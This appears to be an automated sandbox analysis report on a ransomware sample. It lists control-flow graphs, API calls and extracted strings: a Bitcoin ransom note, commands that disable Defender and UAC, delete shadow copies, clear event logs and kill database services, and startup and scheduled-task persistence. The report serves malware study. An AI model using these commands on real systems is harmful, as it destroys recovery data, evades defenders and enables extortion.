112679->112682 112681 a405bb 
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ ",$ /f$ ::$ <span class="spnn">$ ="$" start= auto$" start=auto$", $","$"cmd.exe","$"disaust",$"ren_end",$.PBF$.txt$:: $:\Documents and Settings\$:\Users\$:\Windows\SysMain.sys$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$=" $All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Dflt$INW15$Lpath$Second Email :$Telegram , ID :$Version 5.$X$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\AppData\SysMain.sys$\Start Menu\Programs\Startup\Xinfecter.exe$_Mail-$_[ID-$user$alterencsz="$alterencsz="",$asykat$asykat$c$c$c:\R_cfg.ini$c:\skips.txt$c_drive="$c_drive=""$c_end$dcdcf$dismx$emptyString$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$fpath="$fpath=""$h2gq$invalid stod argument$k2ba8v$mode="$mode="",$mode="fast",$mode="slow",$n7t0$nodisk$noshare$p2h6$r1d8la$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$sc create SqlBakup binPath= "$skip_path="$skip_path=""$spath$spath="$spath=""$stod argument out of range$taskkill /PID $taskkill /im 
msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$tasklist /v /fo csv | findstr /i "dcdcf"$thd_per_drv="$thd_per_drv=""$total_thd="$total_thd=""$u4g8$ver$w#G!$w#G!$w#G!$w#G!
                                          • API String ID: 0-852587191
                                          • Opcode ID: 28b7ea6ea7f228d8a175c3c11f143bb99fca5bfc82a661ae0129a6926ca4515a
                                          • Instruction ID: f8b3bad370b55ce484c998e22cf8d5ef014ff24b5d93e7df2a4d97606baec368
                                          • Opcode Fuzzy Hash: 28b7ea6ea7f228d8a175c3c11f143bb99fca5bfc82a661ae0129a6926ca4515a
                                          • Instruction Fuzzy Hash: 7BD30570E002489BDF14EF64CD86BDEBBB5AF85314F108699E405A7392EB749B84CF91

                                          Control-flow Graph

                                          control_flow_graph 2805 9dc170-9dc1ce call a41740 GetConsoleWindow ShowWindow 2808 9dc269-9dc2ff call 9e90a0 * 3 2805->2808 2809 9dc1d4-9dc20d call 9e1800 2805->2809 2827 9dc306-9dc317 call 9e90a0 2808->2827 2815 9dc210-9dc237 call 9e1940 * 2 2809->2815 2824 9dc239-9dc264 call 9e1c10 call 9d68a0 call 9e1ac0 2815->2824 2833 9dc322-9dc329 2824->2833 2827->2833 2835 9dc32f-9dc343 2833->2835 2836 9dc422-9dc44e call 9b8780 call 9e13c0 2833->2836 2839 9dc345-9dc348 2835->2839 2840 9dc382-9dc385 2835->2840 2854 9dc454-9dc50b call 9e13c0 * 2 call 9e1360 call 9e9040 call 9e9580 call 9e1ac0 * 2 call 9e1660 call 9b8780 call 9e1ac0 * 2 2836->2854 2855 9dc510-9dc852 call 9c2870 GetModuleFileNameW call 9e1260 call 9c36f0 call 9c3590 call 9e11d0 call 9b49c0 call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call 9e1090 * 2 CopyFileW call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call 9e1090 * 2 CopyFileW call 9e10a0 call 9e10c0 call 9ea4d0 call 9e8f40 call 9e9580 call 9e1ac0 call 9e8f40 call 9e9580 call 9e1ac0 call 9e1660 call 9b8780 call 9e1ac0 call 9e1660 call 9b8780 call 9e1ac0 call 9e10a0 call 9e10c0 call 9ea4d0 call 9e8f40 call 9e9580 call 9e1ac0 call 9e1660 call 9b8780 call 9e1ac0 call 9d3dd0 call 9b8780 call 9e13c0 call 9e12d0 call 9c3100 2836->2855 2844 9dc350-9dc35a 2839->2844 2841 9dc387-9dc38a 2840->2841 2842 9dc3c2-9dc3c5 2840->2842 2845 9dc390-9dc39a 2841->2845 2846 9dc3fd-9dc410 SetErrorMode SetConsoleTitleW call 9c58e0 2842->2846 2847 9dc3c7-9dc3ca 2842->2847 2844->2844 2849 9dc35c-9dc37d 2844->2849 2845->2845 2850 9dc39c-9dc3bd 2845->2850 2857 9dc415-9dc41c 2846->2857 2851 9dc3d0-9dc3da 2847->2851 2849->2840 2850->2842 2851->2851 2856 9dc3dc-9dc3f9 2851->2856 2854->2855 2980 9dc854-9dc85b 2855->2980 2981 9dc8b6-9dc8cb call 9c5d90 * 2 2855->2981 2856->2846 2857->2836 2860 9de585-9de5a2 call a405bb 2857->2860 2980->2981 2983 9dc85d-9dc864 2980->2983 2990 9dc8cd-9dc8ec call 9c5d90 * 2 2981->2990 2991 9dc8f2-9dca02 call 
9e10a0 call 9e10c0 call 9ea4d0 call 9e1a90 call 9b8a80 call 9e11d0 call 9b49c0 call 9e10a0 call 9e10c0 call 9ea4d0 call 9b8a80 call 9e9d90 call 9e11d0 call 9b49c0 * 2 call 9c4500 call 9e12b0 2981->2991 2983->2981 2985 9dc866-9dc872 call 9eafa0 2983->2985 2985->2981 2992 9dc874-9dc8b3 call 9e12d0 * 2 call 9b92a0 2985->2992 2990->2991 3037 9dca04-9dca06 2991->3037 2992->2981 3038 9dca0c-9dcaa9 call 9e9b40 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 3 call 9e12d0 call 9b4a20 3037->3038 3039 9dcad8-9dcb15 call 9e12d0 call 9b4a20 call 9b49c0 3037->3039 3093 9dcaae-9dcaca call 9b49c0 3038->3093 3052 9dcb17-9dcb8d call 9e9b40 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 3 3039->3052 3053 9dcb92-9dcbb5 call 9e9b40 3039->3053 3052->3053 3061 9dcbbc-9dcbf0 call 9e12d0 call 9b4a20 3053->3061 3062 9dcbb7 call 9d0fa0 3053->3062 3079 9dcc32 3061->3079 3080 9dcbf2-9dcc22 call 9e12d0 call 9b4a20 3061->3080 3062->3061 3085 9dcc39-9dcc41 3079->3085 3099 9dcc27-9dcc30 3080->3099 3089 9dcc5d-9dcc7f call 9b49c0 3085->3089 3090 9dcc43-9dcc57 call 9b49c0 3085->3090 3101 9dd02b-9dd1f1 call a58980 call 9e37b0 call 9e9130 call 9b3730 call 9e3740 call a58980 call 9c5e60 call 9f5c80 call a58980 call 9de5b0 call a58980 call 9de750 call 9e0230 call 9f2590 call 9e0230 call 9f23c0 3089->3101 3102 9dcc85-9dccc2 call 9e12d0 call 9b4a20 call 9b49c0 3089->3102 3090->3089 3093->3039 3106 9dcacc-9dcad3 3093->3106 3099->3079 3099->3085 3177 9dd1f7-9dd200 3101->3177 3118 9dccc4-9dccd1 call 9e11a0 3102->3118 3119 9dccd6-9dccdc 3102->3119 3106->3037 3118->3119 3123 9dcce0-9dccfb call 9e12d0 call 9baed0 3119->3123 3132 9dcd0d-9dd026 call a58980 call 9e3b00 call 9e0cc0 call 9eae30 call 9e3a90 call 9e1bd0 * 2 call 9e1400 * 2 call 9e1360 call 9e1b10 call 9e1ac0 call 9e1360 call 9e1b10 call 9e1ac0 call 9e13c0 * 2 call 9e1360 call 9e16c0 call 9e16e0 call 9ea5b0 call 9e1170 call 9e11a0 call 9e13c0 * 2 call 9e1360 call 9e16c0 call 9e16e0 call 9ea5b0 call 9e11a0 call 9b7fe0 call 9e1b10 call 9e1ac0 call 
9e1a60 call 9e1a90 call 9e1ac0 call 9b49c0 call 9e1ac0 call 9b49c0 call 9e1ac0 * 4 call 9bac80 3123->3132 3133 9dccfd 3123->3133 3313 9dd82e-9dd891 call a58980 call 9b76c0 call 9f1ba0 call 9e1260 call 9e0e90 3132->3313 3135 9dccff-9dcd02 3133->3135 3136 9dcd04-9dcd0b Sleep 3133->3136 3135->3132 3135->3136 3136->3123 3177->3177 3179 9dd202-9dd26e call 9b7e30 call 9e1b10 call 9e1ac0 call 9e1360 * 2 3177->3179 3201 9dd270-9dd279 3179->3201 3201->3201 3203 9dd27b-9dd291 call 9e1a90 3201->3203 3209 9dd297-9dd2a0 3203->3209 3209->3209 3211 9dd2a2-9dd2c1 call 9c3f00 3209->3211 3218 9dd2c6-9dd2cf 3211->3218 3218->3218 3220 9dd2d1-9dd30a call 9e95d0 call 9e1b10 call 9e1ac0 3218->3220 3233 9dd310-9dd319 3220->3233 3233->3233 3235 9dd31b-9dd72c call 9e1c10 call 9b7e30 call 9e1b10 call 9e1ac0 call a58980 call 9e37b0 call 9e8f40 call 9e9580 call 9e9470 call 9b3730 call 9e1ac0 * 2 call 9e3740 call 9e10a0 call 9e10c0 call 9ea4d0 call a58980 call 9e37b0 call 9e9490 call 9e9470 call 9e1ac0 call 9e9490 call 9e9470 call 9e1ac0 call 9e3740 call 9e1c10 call 9c4670 call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call a58980 call 9e3b00 call 9b3730 call 9e3a90 call 9e12d0 call 9d1c90 3233->3235 3395 9dd731-9dd825 call 9bac80 call 9b49c0 call 9e1ac0 * 2 call 9bb040 call 9e1ac0 call 9bb040 call 9e1ac0 * 5 call 9b7d70 call 9c6020 * 2 3235->3395 3336 9dd8a3-9ddba9 call 9e9de0 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 10 call 9e1bd0 call 9e1660 call a65282 call 9e1bd0 call 9e1660 call a65282 call 9e9de0 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 8 call 9e90a0 3313->3336 3337 9dd893-9dd89e call 9e1170 3313->3337 3489 9ddbaf-9ddbc0 call 9bf5e0 3336->3489 3490 9ddd17-9ddd28 call 9e90a0 3336->3490 3337->3336 3395->3313 3457 9dd829 call 9bb040 3395->3457 3457->3313 3497 9de4a4-9de580 call 9b8780 call 9e1ac0 * 3 call 9b49c0 call 9b78d0 
call 9b49c0 * 2 call 9e1ac0 * 8 call 9b49c0 * 3 call 9e1ac0 3489->3497 3498 9ddbc6-9ddcb7 call 9e9b40 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9b49c0 * 5 call 9e1090 * 2 call a659c6 3489->3498 3495 9ddd2e-9de0a3 call 9b5130 * 2 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 3490->3495 3496 9de450-9de461 call 9e90a0 3490->3496 3687 9de0a9-9de42f call 9b5130 * 2 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9b5240 * 2 3495->3687 3688 9de434-9de44e call 9b5240 * 2 3495->3688 3509 9de491-9de49d call 9cf570 3496->3509 3510 9de463-9de478 call 9cdaf0 * 2 3496->3510 3497->2860 3601 9ddcb9-9ddd00 call 9e9c70 call 9e11d0 call 9b49c0 call 9e1090 * 2 call a659c6 3498->3601 3602 9ddd03-9ddd12 call 9b49c0 3498->3602 3509->3497 3525 9de49f 3509->3525 3510->3497 3533 9de47a-9de48f call 9cdaf0 * 2 3510->3533 3525->3497 3530 9de49f call 9cf570 3525->3530 3530->3497 3533->3497 3601->3602 3602->3497 3687->3688 3688->3497
                                          APIs
                                          • GetConsoleWindow.KERNEL32 ref: 009DC1B9
                                          • ShowWindow.USER32(00000000,00000000), ref: 009DC1C2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Window$ConsoleShow
                                          • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ <span class="spnn">$" start= auto$" start=auto$.PBF$:\Documents and Settings\$:\Users\$:\Windows\SysMain.sys$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Fast$INW15$Lpath$Manual_Mini_Config$Mini_Config$Mini_Config$Normal_Config$Second Email :$Version 5.$\AppData\N-Save.sys$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\Start Menu\Programs\Startup\Xinfecter.exe$user$c$dcdcf$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$h2gq$n7t0$p2h6$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$sc create SqlBakup binPath= "$spath$taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$tasklist /v /fo csv | findstr /i "dcdcf"$u4g8$ver$w#G!$Z0
                                          • API String ID: 3999960783-2274752431
                                          • Opcode ID: fd8f35c180d480d717c8999034446d30a91a26113efc279831ff68231624e475
                                          • Instruction ID: fb3cbf17f72a9a797766971ba756c42851a9757d9474c4f01ef6baa80daa69d2
                                          • Opcode Fuzzy Hash: fd8f35c180d480d717c8999034446d30a91a26113efc279831ff68231624e475
                                          • Instruction Fuzzy Hash: 96D2B170E00298AADB25F765CD56BED77789F91300F4481E9A44A672D3EF702F48CB92

                                          Control-flow Graph

                                          control_flow_graph 4744 9b92a0-9b9340 call 9e6c20 * 2 4749 9b9342-9b934c call 9e6c20 4744->4749 4750 9b9351-9b93a0 call 9e12d0 * 2 call 9eb790 4744->4750 4749->4750 4758 9b94eb-9b95bc call 9e9b40 call 9e80d0 * 2 4750->4758 4759 9b93a6-9b93db call a58400 4750->4759 4778 9b95be-9b95d3 4758->4778 4779 9b95f3-9b961d 4758->4779 4765 9bac48 call 9e8080 4759->4765 4766 9b93e1-9b9442 call a58400 call 9e9b40 4759->4766 4771 9bac4d call a65132 4765->4771 4780 9b94ae-9b94b4 4766->4780 4781 9b9444-9b944d 4766->4781 4777 9bac52 call a65132 4771->4777 4791 9bac57 call 9e8080 4777->4791 4783 9b95e9-9b95f0 call a40c3c 4778->4783 4784 9b95d5-9b95e3 4778->4784 4785 9b961f-9b9634 4779->4785 4786 9b9654-9b9680 4779->4786 4780->4758 4793 9b94b6-9b94cb 4780->4793 4789 9b944f-9b9464 4781->4789 4790 9b9484-9b94ab 4781->4790 4783->4779 4784->4777 4784->4783 4794 9b964a-9b9651 call a40c3c 4785->4794 4795 9b9636-9b9644 4785->4795 4787 9b9686-9b968e 4786->4787 4788 9b9a44-9b9a8f call 9e6c20 4786->4788 4798 9b9690-9b9697 4787->4798 4811 9b9ab1-9b9b1e call 9e9de0 call 9e80d0 4788->4811 4812 9b9a91-9b9aac call 9e6c20 * 2 4788->4812 4799 9b947a-9b9481 call a40c3c 4789->4799 4800 9b9466-9b9474 4789->4800 4790->4780 4809 9bac5c call a65132 4791->4809 4803 9b94cd-9b94db 4793->4803 4804 9b94e1-9b94e8 call a40c3c 4793->4804 4794->4786 4795->4777 4795->4794 4798->4788 4807 9b969d-9b96a3 4798->4807 4799->4790 4800->4771 4800->4799 4803->4771 4803->4804 4804->4758 4807->4798 4813 9b96a5-9b96e3 call a58980 call 9e3b00 4807->4813 4820 9bac61 call a65132 4809->4820 4834 9b9b20-9b9b35 4811->4834 4835 9b9b55-9b9b64 4811->4835 4812->4811 4832 9b96e9-9b9754 call 9f0210 4813->4832 4833 9b9953-9b9960 4813->4833 4828 9bac66 call a65132 4820->4828 4836 9bac6b-9bac70 call a65132 4828->4836 4857 9b980a-9b9834 call 9eb8d0 4832->4857 4858 9b975a 4832->4858 4837 9b9962-9b9964 4833->4837 4838 9b9966-9b998a call 9e7930 call a61daa 4833->4838 4842 9b9b4b-9b9b52 call a40c3c 
4834->4842 4843 9b9b37-9b9b45 4834->4843 4839 9b9b88-9b9be1 call 9e9de0 call 9e80d0 4835->4839 4840 9b9b66-9b9b70 4835->4840 4847 9b998d-9b999e call 9e7a00 4837->4847 4838->4847 4880 9b9be3-9b9bf8 4839->4880 4881 9b9c24-9b9c3d 4839->4881 4849 9b9b72-9b9b79 4840->4849 4842->4835 4843->4828 4843->4842 4870 9b99ca-9b9a40 call 9e47b0 call a28cbf 4847->4870 4871 9b99a0-9b99c5 call 9b3740 4847->4871 4849->4839 4854 9b9b7b-9b9b81 4849->4854 4854->4849 4860 9b9b83 4854->4860 4877 9b991b-9b9922 4857->4877 4878 9b983a-9b989b call 9eb8d0 * 2 4857->4878 4864 9b9760-9b9767 4858->4864 4868 9b9c74-9bab47 call 9e9de0 call 9e80d0 * 32 call 9e6dc0 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9b49c0 * 37 call a58980 call 9e1e80 call 9ea1e0 call 9e1e40 call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call 9e1bd0 call a58980 call 9e3980 call 9e9470 call 9e3910 call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call 9e1bd0 call a58980 call 9e3980 call 9e9470 call 9e3910 call a65282 4860->4868 4865 9b979b-9b97ae call 9e6950 4864->4865 4866 9b9769-9b976b 4864->4866 4897 9b97b0-9b97b6 4865->4897 4898 9b97e7-9b97ee 4865->4898 4873 9b976d-9b9774 4866->4873 4874 9b9796-9b9798 4866->4874 5132 9bab49-9bab50 4868->5132 5133 9bab81-9bac47 call 9bae10 call 9e1ac0 call 9b49c0 call 9bae10 call 9e1ac0 call 9b49c0 call 9bad10 call 9b49c0 * 10 call a405bb 4868->5133 4870->4788 4871->4870 4883 9b9783-9b9787 4873->4883 4884 9b9776-9b977c 4873->4884 4874->4865 4877->4833 4888 9b9924-9b9933 4877->4888 4878->4791 4924 9b98a1-9b98e1 call 9e6c20 call a61d0c 4878->4924 4890 9b9bfa-9b9c08 4880->4890 4891 9b9c0e-9b9c1c call a40c3c 4880->4891 4881->4868 4885 9b9c3f-9b9c54 4881->4885 4906 9b978c-9b978f 4883->4906 4884->4883 4893 9b977e-9b9781 4884->4893 4894 9b9c6a-9b9c71 call a40c3c 4885->4894 4895 9b9c56-9b9c64 4885->4895 4899 9b9949-9b9950 call a40c3c 4888->4899 4900 9b9935-9b9943 4888->4900 4890->4836 4890->4891 4891->4881 4893->4906 4894->4868 4895->4836 4895->4894 4910 9b97b8-9b97bf 
4897->4910 4911 9b97d3-9b97d7 4897->4911 4907 9b97f2-9b9804 call 9f0210 4898->4907 4899->4833 4900->4820 4900->4899 4906->4874 4916 9b9791-9b9794 4906->4916 4907->4857 4907->4864 4910->4911 4918 9b97c1-9b97d1 4910->4918 4921 9b97dc-9b97df 4911->4921 4916->4865 4918->4921 4921->4898 4926 9b97e1-9b97e5 4921->4926 4935 9b98e3-9b98f5 4924->4935 4936 9b9915-9b9918 4924->4936 4926->4907 4938 9b990b-9b9912 call a40c3c 4935->4938 4939 9b98f7-9b9905 4935->4939 4936->4877 4938->4936 4939->4809 4939->4938 5132->5133 5134 9bab52-9bab6e call 9e1bd0 call 9e1660 call a65282 5132->5134 5147 9bab73-9bab7c call 9e1ac0 5134->5147 5147->5133
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009B9A38
                                            • Part of subcall function 00A61D0C: DeleteFileW.KERNEL32(?,?,009B98D8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A61D14
                                            • Part of subcall function 00A61D0C: GetLastError.KERNEL32(?,009B98D8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 00A61D1E
                                            • Part of subcall function 00A61D0C: __dosmaperr.LIBCMT ref: 00A61D25
                                          Strings
                                          • l, xrefs: 009BAB19
                                          • "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\, xrefs: 009B9A4F
                                          • cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, xrefs: 009BAB33
                                          • \AppData\S-8459.vbs, xrefs: 009BA9F1
                                          • a5m6f, xrefs: 009B9822, 009B9845
                                          • " Xinfecter.exe , xrefs: 009B9E99, 009BA2C9
                                          • kaj3n, xrefs: 009B9865, 009B9BA1
                                          • Dim strScriptDim oExec, oWshShellDim ComSpecSet oWshShell = CreateObject("WScript.Shell")ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"Set oExec = oWshShel, xrefs: 009BAA24
                                          • @echo offIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs"), xrefs: 009BAADA
                                          • schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f, xrefs: 009BAB52
                                          • ">NULif "%ERRORLEVEL%"=="0" goto notendgoto secton:notendtimeout /t 15 /nobreak >NULIF NOT EXIST , xrefs: 009BA0A9
                                          • (goto secttwo:sectonIF EXIST , xrefs: 009BA165
                                          • w#G!, xrefs: 009B92B7
                                          • (goto secthree):akakak, xrefs: 009BA7A3
                                          • ">NULif "%ERRORLEVEL%"=="0" goto imerif %lend% == bed (goto akakak)set lend=bedIF EXIST , xrefs: 009B9D39
                                          • ))goto notend):imertimeout /t 90 /nobreak >NULIF EXIST , xrefs: 009BA771
                                          • " /fo csv 2>NUL | find /I ", xrefs: 009B9C8D, 009B9FF9
                                          • ):secttwotasklist /fi "ImageName eq , xrefs: 009B9F49
                                          • \AppData\S-2153.bat, xrefs: 009BAAA7
                                          • \AppData\S-6748.bat, xrefs: 009B955D
                                          • @echo offtasklist /v | find /I /c "dcdcf" > nulif "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunningset lend=debvssadmin.exe D, xrefs: 009B9C77
                                          • rem a5m6f, xrefs: 009B9B8B
                                          • w#G!, xrefs: 009BA7AE, 009BA7F5
                                          • :\Users\ReadMe.hta", xrefs: 009B9ACB
                                          • rem, xrefs: 009B92F4
                                          • slow, xrefs: 009B9344
                                          • )IF NOT EXIST , xrefs: 009BA375
                                          • schtasks /delete /tn Microsoft_Auto_Scheduler /fIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (DEL "%SystemDr, xrefs: 009BA7D1
                                          • "%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\, xrefs: 009B9AA4
                                          • Xinfecter.exe" (IF EXIST ", xrefs: 009BA425
                                          • (start /d , xrefs: 009BA529
                                          • :\Users\, xrefs: 009B94EB, 009BA9C7, 009BAA7D
                                          • Xinfecter.exe" (start /d , xrefs: 009B9DF3, 009BA215
                                          • Xinfecter.exe, xrefs: 009B9686, 009B9B66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: DeleteErrorFileIos_base_dtorLast__dosmaperrstd::ios_base::_
                                          • String ID: ))goto notend):imertimeout /t 90 /nobreak >NULIF EXIST $):secttwotasklist /fi "ImageName eq $)IF NOT EXIST $schtasks /delete /tn Microsoft_Auto_Scheduler /fIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (DEL "%SystemDr$ (goto secthree):akakak$ (goto secttwo:sectonIF EXIST $ (start /d $" /fo csv 2>NUL | find /I "$" Xinfecter.exe $"%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\$"%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$">NULif "%ERRORLEVEL%"=="0" goto imerif %lend% == bed (goto akakak)set lend=bedIF EXIST $">NULif "%ERRORLEVEL%"=="0" goto notendgoto secton:notendtimeout /t 15 /nobreak >NULIF NOT EXIST $:\Users\$:\Users\ReadMe.hta"$@echo offIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs")$@echo offtasklist /v | find /I /c "dcdcf" > nulif "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunningset lend=debvssadmin.exe D$Dim strScriptDim oExec, oWshShellDim ComSpecSet oWshShell = CreateObject("WScript.Shell")ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"Set oExec = oWshShel$Xinfecter.exe$Xinfecter.exe" (IF EXIST "$Xinfecter.exe" (start /d $\AppData\S-2153.bat$\AppData\S-6748.bat$\AppData\S-8459.vbs$a5m6f$cd 